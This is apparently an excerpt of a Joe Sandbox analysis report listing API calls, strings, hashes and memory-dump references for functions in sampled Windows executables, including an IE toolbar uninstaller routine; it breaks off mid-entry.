Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FF8FDF92218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8FDF92244
GetCurrentThreadId.KERNEL32 ref: 00007FF8FDF92252
GetCurrentProcessId.KERNEL32 ref: 00007FF8FDF9225E
QueryPerformanceCounter.KERNEL32 ref: 00007FF8FDF9226E

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: 200cd99a356e0af3d8c185c4eaaafff5b832106bda518c264e89a12f38e3cf16
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 40111F22B14B1189EB008B60EC557A933A4FB697A8F441931DB6E87BA8EF78D155C380

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FF8FDF95C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF8FDF95C2A

Strings

csm, xrefs: 00007FF8FDF95C4F
csm, xrefs: 00007FF8FDF95DBE

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: 12b06b555a115ee955d527ad014ce0b009bddffd4a909be6ac03ddf55aaee813
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: B7719033D096818AD7629B259840B7D7BA0EB14BE8F048135EF5E47BC9EB3DD451C782

Function 00007FF8FDF96298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF8FDF96342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF8FDF9636B

Strings

csm, xrefs: 00007FF8FDF9646B

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: 6c7045df8e3f05ea7ff39f7f8cb7dffd8c12e5f17bfc152eff73f882db3b0f6c
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: EB515D33A187458BD720AF15A84066D77E4FB99BE0F100135EB9E07B95DF38E951CB82

Function 00007FF8FDF9EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF8FDF9EBA3
GetLastError.KERNEL32 ref: 00007FF8FDF9EBC5

Strings

U, xrefs: 00007FF8FDF9EB4F

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: efe7a9960cc97d0ef0b43d17304d503a429f5b9c9b6eb8ae8d6868e4cbee17c5
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: 0D41B363B19A4185DB208F25E8447AA67A1FBA87E4F444031EF4F87798EF3DD441CB81

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FF8FDFA0910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8FDF93A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FF8FDF93A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FF8FDFA0993

Strings

csm, xrefs: 00007FF8FDFA092B
f, xrefs: 00007FF8FDFA0925

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: 66a67fb8f7695ebb67c8991702c80351692a1b5aaff3c6c0750bb5ec7d6270cd
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: A9110633A147868AE714AF22E44196D67A4EB58FD4F088035EF9907B8ACE38D951C781

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FF8FDF93990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8FDF9112F), ref: 00007FF8FDF939E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8FDF9112F), ref: 00007FF8FDF93A21

Strings

csm, xrefs: 00007FF8FDF93A0E

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: 716f8988ed93af115ed25acc188dbe529c2e052a07fef8d9c36ab61d3cfd90ed
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: 8A115E33A18B4186EB208B25E80066977E5FB98B98F584230DF9E07B98EF3CD551CB40

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: QmbK8U.exePID: 1848, Parent PID: 1124COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1047
Total number of Limit Nodes:	29

Executed Functions

Function 00631000 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00631006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00631013
GetLastError.KERNEL32 ref: 0063101F
GetCommandLineW.KERNEL32(?), ref: 00631040
CommandLineToArgvW.SHELL32(00000000), ref: 00631047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00631061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00631073
LoadLibraryW.KERNELBASE(?), ref: 00631085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00631097
FreeLibrary.KERNELBASE(00000000), ref: 006310A4
CloseHandle.KERNELBASE(00000000), ref: 006310AB
CoUninitialize.COMBASE ref: 006310B1
LocalFree.KERNEL32(00000000), ref: 006310BC

Strings

tbcore3U.dll, xrefs: 0063106E, 00631079
Global\IEToolbarUninstaller, xrefs: 0063100C
^wu, xrefs: 00631056
MyUnregisterServer, xrefs: 00631091
tbcore3.dll, xrefs: 0063105C, 00631067

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll$^wu
API String ID: 474438367-1664453585
Opcode ID: f9684e2c47c66fed60f7a57dc0098168acee8b0ada46cf8b226955d2c5d0ed9a
Instruction ID: d8d1348f1fadefc8af446af39af1d5309bf1bace7f4b647c3f394cde7c0ea92c
Opcode Fuzzy Hash: f9684e2c47c66fed60f7a57dc0098168acee8b0ada46cf8b226955d2c5d0ed9a
Instruction Fuzzy Hash: 39110072605765EF8328AFA0AC08AEF379FEE46761F001529F942D7150CF608946CBF2

Function 00631465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 0063146D

Part of subcall function 0063143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00631472,?,?,006354EE,000000FF,0000001E,?,006336FC,?,00000001,?,?,00632A2A,00000018), ref: 00631444
Part of subcall function 0063143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00631454

ExitProcess.KERNEL32 ref: 00631476

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 3fdeaef1b0907da85180b2620a0d6e809b4982f0366f3c9dc840ca3ce376291a
Instruction ID: 06fd1e18ffd06c2f811da395b8b3db5c2cc3185d24d0a15cb25b01fd0bd8f9e5
Opcode Fuzzy Hash: 3fdeaef1b0907da85180b2620a0d6e809b4982f0366f3c9dc840ca3ce376291a
Instruction Fuzzy Hash: B4B09231004208BFDB062F12DC0A88D3F6BFB813A0F609424F8084A032DF72ADA29AD4

Function 0063261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00632630

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 32addfb3d7701754b2e0e43920d6e11ffdd0d652a2ed69c7d566390a4afec138
Instruction ID: 819e558ecab39dab21b53518d69ef82e027f5839311f00c6269a5292071c299f
Opcode Fuzzy Hash: 32addfb3d7701754b2e0e43920d6e11ffdd0d652a2ed69c7d566390a4afec138
Instruction Fuzzy Hash: 37D0A7325543455FDB009F717C597623BDDD784795F10A435BA0CC6261F770C590CB84

Function 00631681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 0063168D

Part of subcall function 00631555: __lock.LIBCMT ref: 00631563
Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 0063159A
Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 006315AF
Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 006315D9
Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 006315EF
Part of subcall function 00631555: __decode_pointer.LIBCMT ref: 006315FC
Part of subcall function 00631555: __initterm.LIBCMT ref: 0063162B
Part of subcall function 00631555: __initterm.LIBCMT ref: 0063163B

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: c6a9296e7e9e079d1738436a3aa46a664c3bb60e6ede57198cab43a7072e46e8
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: 51B0127258030C33DB202A86EC03F063F0E87C1BB0F250020FA0D1D1F1A9A3B96180CE

Non-executed Functions

Function 006310CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00631346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0063135B
UnhandledExceptionFilter.KERNEL32(0063816C), ref: 00631366
GetCurrentProcess.KERNEL32(C0000409), ref: 00631382
TerminateProcess.KERNEL32(00000000), ref: 00631389

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 21150494291ef5fe72dcf371f1863336afa0e02a295bad6328691068c5e78387
Instruction ID: 8c3d291b691994b2727bfcce790a3e7215f07c252b03a126789f53dc26602c21
Opcode Fuzzy Hash: 21150494291ef5fe72dcf371f1863336afa0e02a295bad6328691068c5e78387
Instruction Fuzzy Hash: 1521BEB45003049FC754DFA5ED486943BB2BF18342F40601AE58887B70DBB45989AFC6

Function 006321E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00639458,0000000C,00632320,00000000,00000000,?,0063174F,00000003,?,?,?,?,?,?,006310F6), ref: 006321F7
__crt_waiting_on_module_handle.LIBCMT ref: 00632202

Part of subcall function 006313E1: Sleep.KERNEL32(000003E8,00000000,?,00632148,KERNEL32.DLL,?,00632194,?,0063174F,00000003), ref: 006313ED
Part of subcall function 006313E1: GetModuleHandleW.KERNEL32(?,?,00632148,KERNEL32.DLL,?,00632194,?,0063174F,00000003,?,?,?,?,?,?,006310F6), ref: 006313F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0063222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0063223B
__lock.LIBCMT ref: 0063225D
InterlockedIncrement.KERNEL32(0063A4D8), ref: 0063226A
__lock.LIBCMT ref: 0063227E
___addlocaleref.LIBCMT ref: 0063229C

Strings

DecodePointer, xrefs: 00632233
EncodePointer, xrefs: 0063221F
KERNEL32.DLL, xrefs: 006321F1, 006321F6, 00632201

Memory Dump Source

Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true

Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: d48e1152523ea5062a06ea28b46f08a3f14626caad1705564076688aac0259a3
